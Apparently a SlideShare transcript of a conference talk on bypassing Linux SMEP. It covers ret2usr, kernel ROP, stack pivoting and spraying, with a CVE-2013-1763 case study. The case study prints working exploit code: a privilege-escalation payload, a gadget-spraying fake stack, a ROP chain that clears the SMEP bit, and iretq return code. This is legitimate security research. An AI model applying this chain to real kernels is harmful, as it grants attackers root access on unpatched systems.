SlideShare una empresa de Scribd logo

Linux SMEP bypass techniques

Vitaly Nikolenko
Vitaly Nikolenko

Going from traditional ret2usr attacks to kernel return oriented programming to bypass SMEP (Supervisor Mode Execution Protection)

Tecnología
1 de 53
Descargar para leer sin conexión
Practical SMEP bypass techniques on Linux Vitaly Nikolenko @vnik5287 vnik@cyseclabs.com
Who am I? • Vitaly - @vnik5287 • Security researcher • Kernel exploit development • Kernel hardening techniques
Agenda • Introduction (ret2usr) • SMEP bypass • SMEP, ROP, Spraying • CVE-2013-1763 (case study)
ret2usr • Linux - kernel space on behalf of user space model • User space processes cannot access kernel space • Kernel space can access user space • ret2usr - redirect corrupted code or data ptr to code or data in user space
ret2usr • Memory split • 0 to TASK_SIZE for user- space processes • 47 bits minus one guard page = 0x7FFFFFFFF000 • Corrupted function or data struct pointer • Redirect control flow to escalate_privs() in usespace Function ptr Data struct ptr ((1UL << 47) - PAGE_SIZE) escalate_privs() Data struct High mem addr Low mem addr Kernel space User space
ret2usr Option #1 - corrupted function ptr • Find a function pointer to overwrite • mmap privilege escalation payload in user space: int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred); unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred); commit_creds = 0xffffffffxxxxxxxx; prepare_kernel_cred = 0xffffffffxxxxxxxx; void escalate_privs() { commit_creds(prepare_kernel_cred(0)); } • Trigger the function
ret2usr Privilege escalation • struct cred - basic unit of “credentials” • prepare_kernel_cred - allocates and returns a new struct cred • commit_creds - applies the new credentials
ret2usr Option #1 - corrupted function ptr Function ptr ((1UL << 47) - PAGE_SIZE) escalate_privs() High mem addr Low mem addr Kernel space User space
ret2usr Option #1 - corrupted function ptr • What function pointer to overwrite? • ptmx_fops • int fd = open("/dev/ptmx", O_RDWR); • fsync(fd); • perf_fops • int fd = sys_perf_event_open(…); • fsync(fd); • grep -E ‘_ops$|_fops$’ /boot/System.map*
ret2usr Option #2 - corrupted data struct ptr • Create a fake data structure “A” in user space • Overwrite the function ptr “A.ptr” with priv esc code (also in user space) • Trigger the function
ret2usr Option #2 - corrupted data struct ptr struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs()
ret2usr • When escalate_privs() completes: • retq (stack is not modified) • system(‘/bin/sh’) —> # • clean exit
SMEP
SMEP • Supervisor Mode Execution Protection “The processor introduces a new mechanism that provides next level of system protection by blocking malicious software attacks from user mode code when the system is running in the highest privilege level.“ - 3rd Gen Intel Core (Datasheet, Volume 1)

SMEP OOPS
SMEP • Bit 20 (CR4 register) is set 1 • CR4 register value 0x1407f0 = 0001 0100 0000 0111 1111 0000 Intel® 64 and IA-32 Architectures Software Developer’s Manual Vol 3
SMEP • If CR4.SMEP = 1, instructions may not be fetched from any user-mode address. (according to Intel) • CR4 register can be modified using standard MOV instructions • Clear the SMEP bit: mov $0x1407e0, %cr4
SMEP • Check if SMEP is enabled: • cat /proc/cpuinfo | grep smep # (no root required) • Disable SMEP (“nosmep” kernel parameter) • Hypervisors • Xen, VMWare - SMEP support • VirtualBox, Hyper-V - no SMEP support • VMWare - virtualHW.version “8” or below - no SMEP support
AWS SMEP instance created Jun/Jul 2014
AWS SMEP instance created Jan 2015
ROPing • vmlinux vs vmlinuz? • Kernel debugging RPM, DEB, etc. • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux • ./extract-vmlinux /boot/vmlinuz-… > elf.bin • Finding gadgets • objdump -d ./vmlinux (aligned addresses only) • ROPgadget http://shell-storm.org/project/ROPgadget/ • ./ROPgadget.py --binary ./vmlinux > rop.txt # Intel syntax
ROPing IA32 language density • Almost any sequence of bytes can be interpreted as an instruction 0f 94 c3; sete %bl
ROPing IA32 language density • Almost any sequence of bytes can be interpreted as an instruction 0f 94 c3; sete %bl 94 c3; xchg eax, esp; ret
Stack Pivots • mov %rsp, %rXx ; ret • add %rsp, … ; ret • xchg %rXx, %rsp ; ret • xchg %eXx, %esp ; ret (on a 64-bit system) • will land in user-mode memory • rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef
Stack pivot - NX address Exploit attempt? Why yes it is…
SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
SMEP Bypass struct vuln_ops *dptr; ((1UL << 47) - PAGE_SIZE) struct vuln_ops { void (*a)(); int b; … }; High mem addr Low mem addr Kernel space User space escalate_privs() stack pivot FAKE STACK ROP PAYLOAD
SMEP Bypass • FAKE STACK payload • Option #1: disable SMEP and execute escalate_privs() in user space • Option #2: disable SMEP and execute commit_creds(prepare_kernel_cred(0)) using ROP
SMEP Bypass Option #1 POP XXX; RET High mem addr Low mem addr CR4_VALUE ^ 0xFFFFF MOV XXX, CR4; RET ESCALATE_PRIVS() in userspace
CR4 register • How to get the value of the CR4 register? • Option #1 - hardcoded (0x1407f0) • gdb - no support • Look at kernel oops • Option #2 - ROP chain MOV %CR4, %REGISTER XOR %REGISTER, $0xFFFFF MOV %REGISTER, %CR4
Fake stack • xchg %eax, %esp; ret • rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef • Prepare fake stack at 0xdeadbeef in userspace
Fake stack • What if we don’t control %rax or %eax when pivoting? • %rax <— random value • Allocate ~4GB - mmap_min_addr to 0xFFFFFFFF and spray it with our ROP payload
Fake stack Spraying ROP INSTR 1 0xFFFFFFFF 0x10000 ROP INSTR 2 ROP INSTR 3 … ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
Fake stack Spraying ROP INSTR 1 0xFFFFFFFF 0x10000 ROP INSTR 2 ROP INSTR 3 … ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
Fake stack Spraying • May land in the middle of our ROP payload • Will likely page fault! • An alternative is to spray the stack with an %rsp- advancing gadget: • pop %xxx; ret • nop; ret
Fake stack Spraying POP RAX; RET 0xFFFFFFFF 0x10000 POP RAX; RET POP RAX; RET … POP RAX; RET ROP INSTR 1 ROP INSTR 2 ROP INSTR 3 …
PART 2 - CVE-2013-1763
Target • Ubuntu 12.04.02 > uname -a Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux • Ivy Bridge+
CVE-2013-1763 SOCK_DIAG • Affected kernel versions: 3.3 - 3.8 • Trivial out bounds array access • Public exploit code available (32 bit?)
CVE-2013-1763 SOCK_DIAG
CVE-2013-1763 SOCK_DIAG
CVE-2013-1763 SOCK_DIAG
CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; High mem addr Low mem addr Kernel space User space 0x1ad38
CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; High mem addr Low mem addr Kernel space User space 0x1ad38 xchg %eax, %ebp ret 0xffffffff81ad2c32
CVE-2013-1763 SOCK_DIAG sock_diag_handl ers[45] ((1UL << 47) - PAGE_SIZE) FAKE STACK High mem addr Low mem addr Kernel space User space 0x1ad38 xchg %eax, %ebp ret 0xffffffff81ad2c32 struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; 0x35000000 0x45000000
CVE-2013-1763 SOCK_DIAG • Map the fakestack area in user-space: • 0x35000000 - 0x45000000 • fakestack = mmap((void*)0x35000000, 0x10000000, 7| PROT_EXEC|PROT_READ|PROT_WRITE, 0x32, 0, 0)) • Spray the fakestack with: • pop rax; ret for (int p = 0; p < 0x10000000/sizeof(void*); p++) *fakestack ++= 0xffffffff8100ad9eUL; // pop rax; ret
CVE-2013-1763 SOCK_DIAG ptr = (unsigned long *)(fakestack + 0x10000000 - 0x1000); *fakestack ++= 0xffffffff8133dc8fUL; // pop rdi; ret *fakestack ++= 0x407e0; // CLEAR SMEP BIT *fakestack ++= 0xffffffff810032edUL; // mov cr4, rdi; pop rbp; ret *fakestack ++= 0xdeadbeef; // dummy placeholder *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
CVE-2013-1763 SOCK_DIAG • What about the stack ptr? • iret it! static void saveme() { asm( "movq %%cs, %0n" "movq %%ss, %1n" "pushfqn" "popq %2n" : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"); }
CVE-2013-1763 SOCK_DIAG static void restore() { asm volatile( "swapgs ;" "movq %0, 0x20(%%rsp)tn" "movq %1, 0x18(%%rsp)tn" "movq %2, 0x10(%%rsp)tn" "movq %3, 0x08(%%rsp)tn" "movq %4, 0x00(%%rsp)tn" "iretq" : : "r" (user_ss), "r" ((unsigned long)0x36000000), "r" (user_rflags), "r" (user_cs), "r" (shell) ); }
DEMO - ROP BYPASS
Questions? @vnik5287

Recomendados

Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven Rostedt
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven RostedtKernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven Rostedt
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven RostedtAnne Nicolas
 
semaphore & mutex.pdf
semaphore & mutex.pdfsemaphore & mutex.pdf
semaphore & mutex.pdfAdrian Huang
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 
Debugging Android Native Library
Debugging Android Native LibraryDebugging Android Native Library
Debugging Android Native LibraryNSConclave
 
Page cache in Linux kernel
Page cache in Linux kernelPage cache in Linux kernel
Page cache in Linux kernelAdrian Huang
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 

Recomendados

Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven Rostedt
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven RostedtKernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven Rostedt
Kernel Recipes 2017 - Understanding the Linux kernel via ftrace - Steven RostedtAnne Nicolas
 
semaphore & mutex.pdf
semaphore & mutex.pdfsemaphore & mutex.pdf
semaphore & mutex.pdfAdrian Huang
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 
Debugging Android Native Library
Debugging Android Native LibraryDebugging Android Native Library
Debugging Android Native LibraryNSConclave
 
Page cache in Linux kernel
Page cache in Linux kernelPage cache in Linux kernel
Page cache in Linux kernelAdrian Huang
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 
Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)Adrian Huang
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPFAlex Maestretti
 
Introduction to Perf
Introduction to PerfIntroduction to Perf
Introduction to PerfWang Hsiangkai
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdfAdrian Huang
 
SFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress UpdateSFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress UpdateLinaro
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCKernel TLV
 
Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Ray Jenkins
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Linux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBLinux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBshimosawa
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debuggingHao-Ran Liu
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Adrian Huang
 
Booting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesBooting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesChris Simmonds
 
Blazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBlazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBrendan Gregg
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux SystemJian-Hong Pan
 
Linux kernel tracing
Linux kernel tracingLinux kernel tracing
Linux kernel tracingViller Hsiao
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 National Cheng Kung University
 
Understanding the Android System Server
Understanding the Android System ServerUnderstanding the Android System Server
Understanding the Android System ServerOpersys inc.
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...Yuichiro Yasui
 

Más contenido relacionado

La actualidad más candente

Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)Adrian Huang
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPFAlex Maestretti
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdfAdrian Huang
 
SFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress UpdateSFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress UpdateLinaro
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCKernel TLV
 
Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Ray Jenkins
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Linux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBLinux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBshimosawa
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debuggingHao-Ran Liu
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Adrian Huang
 
Booting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesBooting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesChris Simmonds
 
Blazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBlazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBrendan Gregg
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux SystemJian-Hong Pan
 
Linux kernel tracing
Linux kernel tracingLinux kernel tracing
Linux kernel tracingViller Hsiao
 
Understanding the Android System Server
Understanding the Android System ServerUnderstanding the Android System Server
Understanding the Android System ServerOpersys inc.
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 

La actualidad más candente (20)

Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)Anatomy of the loadable kernel module (lkm)
Anatomy of the loadable kernel module (lkm)
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File System
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPF
 
Introduction to Perf
Introduction to PerfIntroduction to Perf
Introduction to Perf
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux Kernel
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdf
 
SFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress UpdateSFO15-302: Energy Aware Scheduling: Progress Update
SFO15-302: Energy Aware Scheduling: Progress Update
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCC
 
Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
 
Linux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBLinux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKB
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debugging
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...
 
Booting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesBooting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot images
 
Blazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBlazing Performance with Flame Graphs
Blazing Performance with Flame Graphs
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux System
 
Linux kernel tracing
Linux kernel tracingLinux kernel tracing
Linux kernel tracing
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道
 
Understanding the Android System Server
Understanding the Android System ServerUnderstanding the Android System Server
Understanding the Android System Server
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 

Similar a Linux SMEP bypass techniques

Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...Yuichiro Yasui
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
Is That A Penguin In My Windows?
Is That A Penguin In My Windows?Is That A Penguin In My Windows?
Is That A Penguin In My Windows?zeroSteiner
 
VMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep DiveVMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep DiveVMworld
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource KernelsSilvio Cesare
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
Austin c-c++-meetup-feb2018-spectre
Austin c-c++-meetup-feb2018-spectreAustin c-c++-meetup-feb2018-spectre
Austin c-c++-meetup-feb2018-spectreKim Phillips
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelJinbumPark
 
CNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsCNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsSam Bowne
 
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) Hypervisor
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) HypervisorAsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) Hypervisor
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) HypervisorDave Voutila
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceSUSE Labs Taipei
 
Netmap presentation
Netmap presentationNetmap presentation
Netmap presentationAmir Razmjou
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityAndrew Case
 
ExtraV - Boosting Graph Processing Near Storage with a Coherent Accelerator
ExtraV - Boosting Graph Processing Near Storage with a Coherent AcceleratorExtraV - Boosting Graph Processing Near Storage with a Coherent Accelerator
ExtraV - Boosting Graph Processing Near Storage with a Coherent AcceleratorJinho Lee
 

Similar a Linux SMEP bypass techniques (20)

Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)
 
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
NUMA-aware thread-parallel breadth-first search for Graph500 and Green Graph5...
 
SdE2 - Pilot Tock
SdE2 - Pilot TockSdE2 - Pilot Tock
SdE2 - Pilot Tock
 
Genode Compositions
Genode CompositionsGenode Compositions
Genode Compositions
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
Is That A Penguin In My Windows?
Is That A Penguin In My Windows?Is That A Penguin In My Windows?
Is That A Penguin In My Windows?
 
VMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep DiveVMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep Dive
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource Kernels
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Austin c-c++-meetup-feb2018-spectre
Austin c-c++-meetup-feb2018-spectreAustin c-c++-meetup-feb2018-spectre
Austin c-c++-meetup-feb2018-spectre
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
 
CNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsCNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection Mechanisms
 
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) Hypervisor
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) HypervisorAsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) Hypervisor
AsiaBSDCon2023 - Hardening Emulated Devices in OpenBSD’s vmd(8) Hypervisor
 
Page table manipulation attack
Page table manipulation attackPage table manipulation attack
Page table manipulation attack
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to Userspace
 
Netmap presentation
Netmap presentationNetmap presentation
Netmap presentation
 
Dpdk applications
Dpdk applicationsDpdk applications
Dpdk applications
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
 
ExtraV - Boosting Graph Processing Near Storage with a Coherent Accelerator
ExtraV - Boosting Graph Processing Near Storage with a Coherent AcceleratorExtraV - Boosting Graph Processing Near Storage with a Coherent Accelerator
ExtraV - Boosting Graph Processing Near Storage with a Coherent Accelerator
 

Último

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
